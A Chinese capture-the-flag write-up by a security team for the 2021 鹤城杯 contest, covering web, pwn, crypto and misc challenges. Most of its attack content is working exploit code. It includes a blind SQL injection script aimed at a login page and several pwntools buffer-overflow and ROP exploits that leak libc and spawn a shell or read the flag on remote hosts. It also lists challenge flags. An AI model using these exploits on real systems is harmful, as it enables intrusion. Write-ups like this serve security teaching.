酷应用

鹤城杯-WriteUp

百家作者：Chamd5安全团队 2021-10-09 18:00:57

Web

middle_magic

解题思路

flag{f03d41bf6c8d55f12324fd57f7a00427}

easy_sql_2

解题思路注入脚本：

#?-*-coding:utf-8-*-
import?requests

def?bind_sql():
????flag?=?""
????dic?=?"~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+*)(&%$#!"
????for?i?in?range(1,1000):
????????f?=?flag
????????for?j?in?dic:
????????????_?=?flag?+?j
????????????#?payload?=?"11'||('ctf',binary'{}',1,2,3,4)<(table/**/mysql.innodb_table_stats/**/limit/**/1,1)#".format(_)
????????????#admin,fl11aag
????????????payload?=?"11'||(binary'{}')<(table/**/ctf.fl11aag/**/limit/**/1,1)#".format(_)
????????????print(payload)
????????????data?=?{
????????????????"username":?payload,
????????????????"password":?"admin"
????????????}
????????????res?=?requests.post(url=url,?data=data)
????????????if?'success'?in?res.text:
????????????????if?j?==?'~':
????????????????????flag?=?flag[:-1]?+?chr(ord(flag[-1])+1)
????????????????????print(flag)
????????????????????exit()
????????????????flag?+=?j
????????????????print(flag)
????????????????break
????????if?flag?==?f:
????????????break
????return?flag

if?__name__?==?'__main__':
????url?=?'http://182.116.62.85:26571/login.php'
????result?=?bind_sql()
????print(result)

spring

解题思路
payload:

flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

easyP

解题思路
payload:

/index.php/utils.php/%ff/?show[source

spring

解题思路
payload: img flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

Pwn

littleof

解题思路
白给

#?-*-?coding:?utf-8?-*-
from?pwn?import?*
#p=process('./1')
p=remote('182.116.62.85',27056)
elf=ELF('1')
libc=ELF('libc-2.27.so')
context(arch='amd64',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?lg(name,val):
????log.success(name+'?:?'+hex(val))

pop_rdi=0x0000000000400863
pop_rsi_r15=0x0000000000400861
ret=0x000000000040059e

p.recvuntil('Do?you?know?how?to?do?buffer?overflow?')
p.send(0x49*'a')
p.recvuntil(0x49*'a')
canary=u64('\x00'+p.recv(7))
bp=u64(p.recv(6).ljust(8,'\x00'))
print?hex(bp)
print?hex(canary)

payload=0x48*'a'+p64(canary)+p64(bp)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x4006E2)
p.recvuntil('Try?harder!')
p.send(payload)

libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']


payload=0x48*'a'+p64(canary)+p64(bp-8)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
#debug()

p.send(payload)
p.recvuntil('Try?harder!')
p.send(payload)
p.interactive()

babyof

解题思路
也是白给

#?-*-?coding:?utf-8?-*-
from?pwn?import?*
#p=process('./1')
p=remote('182.116.62.85',21613)
elf=ELF('1')
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
libc=ELF('libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p=remote('node4.buuoj.cn',26442)
#libc=ELF('/ctf/work/buuoj/buu_libc/libc-2.27_64.so')
context(arch='amd64',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?lg(name,val):
????log.success(name+'?:?'+hex(val))
def?add():
????p.recvuntil('Give?me?your?choice?:?')
????p.sendline('1')

ret=0x0000000000400506
pop_rdi=0x0000000000400743
p.recvuntil('Do?you?know?how?to?do?buffer?overflow?')

payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x400632?)
p.send(payload)

libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']

print?hex(libc.address)

payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
p.send(payload)
p.recvuntil('Do?you?know?how?to?do?buffer?overflow?')
p.send(payload)
p.interactive()

PWN1

解题思路
脑瘫原题 ciscn 2018 supermarket

onecho

解题思路
算半个白给题吧，scanf溢出ROP，leak libc地址,因为malloc_hook和free_hook是可写的，所以构造read往里面写入flag,最后orw

#?-*-?coding:?utf-8?-*-
from?pwn?import?*
#p=process('./1')
p=remote('182.116.62.85',24143)
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
libc=ELF('libc.so.6')

context(arch='i386',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
#context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?lg(name,val):
????log.success(name+'?:?'+hex(val))
def?add():
????p.recvuntil('Give?me?your?choice?:?')
????p.sendline('1')
gadget=0x08049810#pop?ebx?;?pop?esi?;?pop?edi?;?pop?ebp?;?ret
p.recvuntil('Input?your?name:')
elf=ELF('1')
payload=0x110*'a'+p32(gadget)+p32(1)*4+p32(elf.plt['puts'])+p32(0x8049743)+p32(elf.got['puts'])

p.sendline(payload)
#debug()
libc.address=u32(p.recvuntil('\xf7')[-4:])-libc.sym['puts']
lg('libc.address',libc.address)

p.recvuntil('Input?your?name:')
payload=0x110*'a'+p32(gadget)+p32(1)*4+p32(libc.sym['read'])?+?p32(0x08049743)?+?p32(0)?+?p32(libc.sym['__malloc_hook'])?+?p32(8)

p.sendline(payload)
#debug()
sleep(0.5)
p.send('flag')

p.recvuntil('Input?your?name:')
payload=0x110*'a'+p32(gadget)+p32(1)*4+p32(libc.sym['open'])+p32(0x8049743)+p32(libc.sym['__malloc_hook'])+p32(0)
p.sendline(payload)

'''
rop=ROP(libc)
rop.open(libc.sym['__malloc_hook'],0)
rop.read(3,libc.sym['__free_hook'],0x20)
rop.write(1,libc.sym['__free_hook'],0x20)
p.recvuntil('Input?your?name:')
payload=0x110*'a'+p32(gadget)+p32(1)*4+rop.chain()
p.sendline(payload)

p.interactive()
'''

p.recvuntil('Input?your?name:')
payload=0x110*'a'+p32(gadget)+p32(1)*4+p32(libc.sym['read'])+p32(0x8049743)+p32(3)+p32(libc.sym['__free_hook'])+p32(0x30)
p.sendline(payload)

p.recvuntil('Input?your?name:')
payload=0x110*'a'+p32(gadget)+p32(1)*4+p32(libc.sym['write'])+p32(0x8049743)+p32(1)+p32(libc.sym['__free_hook'])+p32(0x30)
p.sendline(payload)

p.interactive()

easycho

解题思路
通过恶意更改canary触发smash打印出flag

#?-*-?coding:?utf-8?-*-
from?pwn?import?*
#p=process('./1')
p=remote('182.116.62.85',24842)
context(arch='amd64',?os='linux',?terminal=['tmux',?'splitw',?'-h'])
#context.log_level='debug'
def?debug():
????gdb.attach(p)
????pause()
def?lg(name,val):
????log.success(name+'?:?'+hex(val))

????
p.recvuntil('Name:?')
p.sendline(16*'a')
p.recvuntil(16*'a')
base=u64(p.recv(6).ljust(8,'\x00'))-3312
lg('base',base)
p.recvuntil('Input:?')
p.sendline(0x100*'b'+0x50*'a'+p64(0x111)+p64(0x1111)+p64(base+0x202040)+p64(base+0x202040))
p.recvuntil('Input:?')
p.sendline('backdoor')
#debug()
p.recvuntil('Input:?')
p.sendline('exitexit')
p.interactive()

Crypto

a_crypto

解题思路
先rot13解密

16进制转字符

a?=?"4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35"
for?i?in?range(0,len(a),2):
????print(chr(eval('0x'+a[i]+a[i+1])),end="")
#KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5

接着 base64 base85就可以出了（有混淆需要去掉）
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}

easy_crypto

解题思路
公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐

Misc

new_misc

解题思路
pdf隐写，使用wbs43open即可：

flag{verY_g00d_YoU_f0und_th1s}

流量分析

解题思路
SQL注入

flag=""
a=0
for?i?in?[102,108,97,103,123,119,49,114,101,115,104,65,82,75,95,101,122,95,49,115,110,116,105,116,125,126,126]:
????flag=flag+chr(i)
????a=a+1
????print(a)
????print(flag)